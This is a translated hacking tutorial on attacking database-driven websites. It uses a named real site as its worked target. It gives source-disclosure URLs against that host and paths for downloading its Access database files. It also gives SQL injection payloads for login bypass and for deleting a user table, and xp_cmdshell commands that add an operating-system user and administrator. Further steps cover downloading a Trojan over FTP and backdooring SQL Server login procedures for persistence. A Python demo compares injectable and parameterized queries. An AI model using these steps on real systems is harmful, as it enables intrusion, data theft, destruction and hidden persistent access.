Almost every web server uses a database to store information, and almost every website relies on one. That leaves two possibilities: a small database such as Access, usually stored locally on the web server, or a large database such as SQL Server or Oracle, running on another machine and reached through ODBC.
Because the pages constantly query information, modify user data and so on, the application is essentially always talking to the database. That is what gives an illegitimate user his opening.
1. Attacks on a local database.
Attacking a local database means downloading the database file itself; once you open it you get the users, accounts and other useful information inside.
Take "Lotus" (www.suilian.net) as the example:
After scanning, I know that www.suilian.net is a virtual host running Windows NT with IIS 4.0. The scanner can be TwwWScan or another; their features differ a little.
If you can read the ASP source code while attacking IIS, the chance of success is high.
Testing showed that this site had the source-code disclosure vulnerability...
You can try:
http://www.suilian.net/null.htw?CiWebHitsFile=/maillist.asp&CiRestriction=none&CiHiliteType=Full
http://www.suilian.net/null.htw?CiWebHitsFile=/index.asp&CiRestriction=none&CiHiliteType=Full
http://www.suilian.net/null.htw?CiWebHitsFile=/chat/detnew.asp&CiRestriction=none&CiHiliteType=Full
http://www.suilian.net/null.htw?CiWebHitsFile=/chat/detail.asp&CiRestriction=none&CiHiliteType=Full
http://www.suilian.net/null.htw?CiWebHitsFile=/chat/topic4.asp&CiRestriction=none&CiHiliteType=Full
http://www.suilian.net/null.htw?CiWebHitsFile=/chat/titlefrm.asp&CiRestriction=none&CiHiliteType=Full
http://www.suilian.net/null.htw?CiWebHitsFile=/chat/titlenew.asp&CiRestriction=none&CiHiliteType=Full
What do you see?
Of course there are many kinds of source-code disclosure vulnerabilities; check a vulnerability reference for the rest.
Now you can go and read the ASP source code.
If you are not familiar with ASP, a short introduction:
ASP code is embedded between <% and %>, and is generally written in VBScript or JScript.
Look at this example written in VBScript:
<%
...
' Create the ADO connection object
Set CN1 = Server.CreateObject("ADODB.Connection")
' Resolve user.mdb relative to the directory this page lives in
dbpath = Server.MapPath("user.mdb")
' Open the Access file through the ODBC driver
CN1.Open "Driver={Microsoft Access Driver (*.mdb)};DBQ=" & dbpath
' Create the recordset and fill it from table yhb
Set RS = Server.CreateObject("ADODB.Recordset")
RS.Open "SELECT * FROM yhb", CN1, adOpenKeyset   ' adOpenKeyset = 1, defined in adovbs.inc
...
%>
This is typical database-connection code.
The steps, in order, are:
create the connection object,
set the database path,
open the database,
create the recordset object,
open the recordset with a query.
From it we learn the database type (Access), its name (user.mdb) and its path: here, the same directory as the page.
We also learn a table name (yhb) and, from the query and the fields the page uses, the field names.
Experienced programmers generally do not put the database file directly in the code; they set up a data source in ODBC instead, which at least keeps the file name and path out of the page.
Then find the databases that exist, such as
D:\s\suilian\chat\news.mdb
D:\S\suilian\topic22.mdb
Because they sit under the web root, you only need to request
http://www.suilian.net/chat/news.mdb
http://www.suilian.net/topic22.mdb
and you can download them...
1. Breaking through script restrictions.
For example, a page has a text box for the user name but only lets you enter 4 characters. Many programs enforce such limits on the client only and pop up an error with MsgBox. If you need to get past the restriction during an attack, just save a copy of the page locally and remove the limit, usually by deleting the VBScript or JavaScript check; then submit from the local copy.
If the check is written in JavaScript it is even simpler: temporarily disable scripting in the browser. If it is
Experienced programmers check the input a second time on the server while processing it and, if there is an error, output it with Response.Write or a similar statement.
2. Breaking through with SQL.
For example, a web page asks for a user name and password, so two text boxes wait for your input. Suppose there is a user ADAM; we don't know his password, but we want to log in as him.
Normally we enter ADAM in the first box and 1234 in the second; if the password is correct we are let in, otherwise an error is reported.
The query in the program may be:
SQL = "SELECT * FROM user WHERE username = '" & text1.value & "' AND passwd = '" & text2.value & "'"
What executes is
SELECT * FROM user WHERE username = 'adam' AND passwd = '1234'
All right.
If what we enter in text2 is not 1234 but 1234' OR '1'='1
then our SQL statement becomes
SELECT * FROM user WHERE username = 'adam' AND passwd = '1234' OR '1'='1'
AND binds tighter than OR, so the condition is true for every row, the result set is not empty, and we are in...
Experienced programmers add a filter for special characters such as the single quote.
Broadly, programmers are in the habit of writing the login check in one of two ways. In ASP with VBScript, the first is SELECT * FROM ... WHERE username = '" & Request.Form("username") & "' AND password = '" & Request.Form("password") & "'", then testing whether the result set is empty. There is in fact another way:
SELECT * FROM ... WHERE username = '" & Request.Form("username") & "'", then comparing the password held in the result set with the one submitted. This method is safer: the password box is no longer part of the statement, so the OR '1'='1 trick in it does nothing. The user name is still concatenated in, so it still needs the single-quote filtering just mentioned.
3. Multi-statement vulnerabilities.
Following the same idea: if the user looks up books by title (e.g. Linux Getting Started), the SQL statement is
SELECT book.name, book.content FROM book WHERE bookname = 'Linux Getting Started'
If what we enter is not the title but Linux Getting Started' DELETE FROM user WHERE '1'='1
the statement becomes
SELECT book.name, book.content FROM book WHERE bookname = 'Linux Getting Started' DELETE FROM user WHERE '1'='1'
which deletes the contents of the user table.
The prerequisite for success is that the other side lets several statements run in one batch.
Because the program does not handle the boundary character ', the damage the vulnerability does depends on the type of result set and on the database configuration. First, the result set: if only a single SQL statement can be executed, all you can do is the OR '1'='1 trick in the password box, and nothing else.
Where batches are allowed, we can use the same approach to add users to the database.
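The two login methods from section 2 and the stacked-statement deletion from section 3, as an added example (not code from the original article) in Python against an in-memory SQLite database. The users, books and passwords are constructed sample data; the table and column names follow the article. SQLite's execute() refuses a second statement, which stands in for a server that runs one statement at a time, while executescript() runs the whole string as a batch, which stands in for one that allows stacked statements (SQLite needs the ';' between them that T-SQL does not).

```python
import sqlite3

# Constructed sample data standing in for the article's "user" and "book" tables.
USERS = [("adam", "secret"), ("bob", "hunter2")]
BOOKS = [("Linux Getting Started", "chapter 1 ..."), ("Perl Basics", "chapter 1 ...")]


def make_db():
    """In-memory SQLite database holding the two tables the article talks about."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (username TEXT, passwd TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?)", USERS)
    con.execute("CREATE TABLE book (bookname TEXT, content TEXT)")
    con.executemany("INSERT INTO book VALUES (?, ?)", BOOKS)
    con.commit()
    return con


def login_concat(con, username, password):
    """The article's first method: both boxes concatenated into the WHERE
    clause, success = non-empty result set.  Injectable through either box."""
    sql = ("SELECT * FROM user WHERE username = '" + username
           + "' AND passwd = '" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_compare(con, username, password):
    """The article's second method: fetch the row by user name only and compare
    the password in code.  The password box never reaches the statement, so
    OR '1'='1 in it fails; the user name is still concatenated and still needs
    its quotes handled."""
    sql = "SELECT passwd FROM user WHERE username = '" + username + "'"
    row = con.execute(sql).fetchone()
    return row is not None and row[0] == password


def login_param(con, username, password):
    """Hardened form: bound parameters, so input can never become SQL."""
    row = con.execute(
        "SELECT 1 FROM user WHERE username = ? AND passwd = ?",
        (username, password)).fetchone()
    return row is not None


def search_books(con, bookname, allow_batch=False):
    """Book search from section 3 with the title concatenated into the query.
    allow_batch=False: execute() runs one statement and raises on a second.
    allow_batch=True: executescript() runs every statement in the string, the
    way a server that accepts stacked statements would; returns None because
    batch execution discards result sets."""
    sql = "SELECT bookname, content FROM book WHERE bookname = '" + bookname + "'"
    if allow_batch:
        con.executescript(sql)
        return None
    return con.execute(sql).fetchall()


def count_users(con):
    """Row count of the user table, to observe the effect of the stacked DELETE."""
    return con.execute("SELECT COUNT(*) FROM user").fetchone()[0]


if __name__ == "__main__":
    con = make_db()
    bypass = "1234' OR '1'='1"
    print("concat  :", login_concat(con, "adam", bypass))   # True: we are in
    print("compare :", login_compare(con, "adam", bypass))  # False
    print("param   :", login_param(con, "adam", bypass))    # False
    stacked = "Linux Getting Started'; DELETE FROM user WHERE '1'='1"
    try:
        search_books(con, stacked)
    except (sqlite3.Warning, sqlite3.ProgrammingError) as err:
        print("single-statement driver refused:", err)
    search_books(con, stacked, allow_batch=True)
    print("users left after stacked query:", count_users(con))  # 0
```

Run it directly to see the three login checks against the same payload and the user table emptied only once stacked statements are permitted.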
4. When SQL Server is installed, the administrative user sa is created automatically with an empty password. Many people never change it after installation, which leaves a large security hole; more on that later.
The connection code in a program is generally not put in global.asa but in an include file (SSI). Include files are customarily kept under the web root in /include or /inc, with names like conifn.inc, db_conn.inc, dbconn.inc and so on, so the name can sometimes be guessed.
Even if the directory cannot be listed, once the file name is guessed it hardly matters: .inc is usually not mapped to a script handler, so requesting it directly either downloads it or displays its source.
There is also the case where the main program includes an .inc file and does not handle ': the error message returned when the page fails at run time then exposes the .inc file's path. I have run into several such cases. IIS can in fact be set not to send script error details to the client.
5. Using the database.
If the program's connection user has very few permissions and most tables are read-only, you will have a hard time. What remains is to guess table and field names and try to delete data or whole tables.
INSERT statements are the annoying ones: there are many columns, and the trailing ")" has to be dealt with.
I will talk mainly about MS SQL Server, which I know best. Its default port is 1433. Telnet to that port on the server; if it connects, it may well be MS SQL Server, though that is only a possibility.
Now, on to using the database.
If the other side's database is directly on the web server, you know the port number and you have an account, simply connect with Query Analyzer and run SQL statements in it. The commonly used one is the stored procedure master.dbo.xp_cmdshell, an extended stored procedure with a single parameter, which it hands to the operating system to run as a command.
If you are an administrative user you have the right to run this procedure and can do a great deal: ipconfig to see the IP settings, net user to list system users. NET USER /ADD with a user name and password does not always succeed, however; sometimes it returns "the specified login session does not exist" without executing, and I am not clear why. If you lack the permission, it doesn't matter: MS SQL Server has a vulnerability whereby a temporary stored procedure bypasses the permission check, for example:
-- temporary procedure (# prefix); its body passes the caller's argument to xp_cmdshell
CREATE PROC #cmdshell (@cmdstr varchar(200))
AS
EXEC master.dbo.xp_cmdshell @cmdstr
Of course, this does not give permission to run NET USER /ADD, but you can look around, and you can create files.
The trick is to write an FTP script with echo, put the Trojan on an FTP site, then call ftp through the stored procedure with that script to download and install it, and then... heh :)
If the database is not installed on the web server, there may still be no way to find it, or its port number has been changed.
If the database server cannot be reached directly from the Internet, you can still use the program's vulnerability to delete or modify data, or store JavaScript in the database: they usually do not filter < and > when saving input, so you can use JavaScript to send visitors to another site or do other things.
If only the port number has been changed, look at which database user the program connects as. If it is an administrative user, you can create an operating-system user with exec master.dbo.xp_cmdshell 'net user aaa bbb /add' and then promote it to administrator with exec master.dbo.xp_cmdshell 'net localgroup administrators aaa /add'.
If the server's NetBIOS is bound to TCP/IP and the C$, D$ and other administrative shares exist, well, congratulations: at the DOS prompt, net use z: \\ipaddress\c$ bbb /user:aaa maps the other side's entire C drive to local network drive z:.
6. How to stay in the database.
sp_addlogin, which creates a login, and sp_addsrvrolemember, which assigns a login to a server role, each start with a statement that checks whether the caller has permission; only if that check passes does the procedure go on to do its work.
Once you have broken into a database you can use Enterprise Manager to alter these stored procedures, because they are not encrypted.
Add a condition to that check: when your condition is met, the procedure proceeds regardless of who called it.
Be careful, though: the altered procedure is then the one every user runs. If you later want to restore it, you can rename the modified sp_addlogin in the sysobjects table and put back the unmodified copy from an MS SQL Server of the same version.
And don't forget that by default these system objects cannot be modified by hand: you must first change the SQL Server configuration option (allow updates) that permits it, and remember to change it back afterwards. From then on you can create SQL Server administrative users whenever you like.
7. Database Scanning Tools.
ISS Database Scanner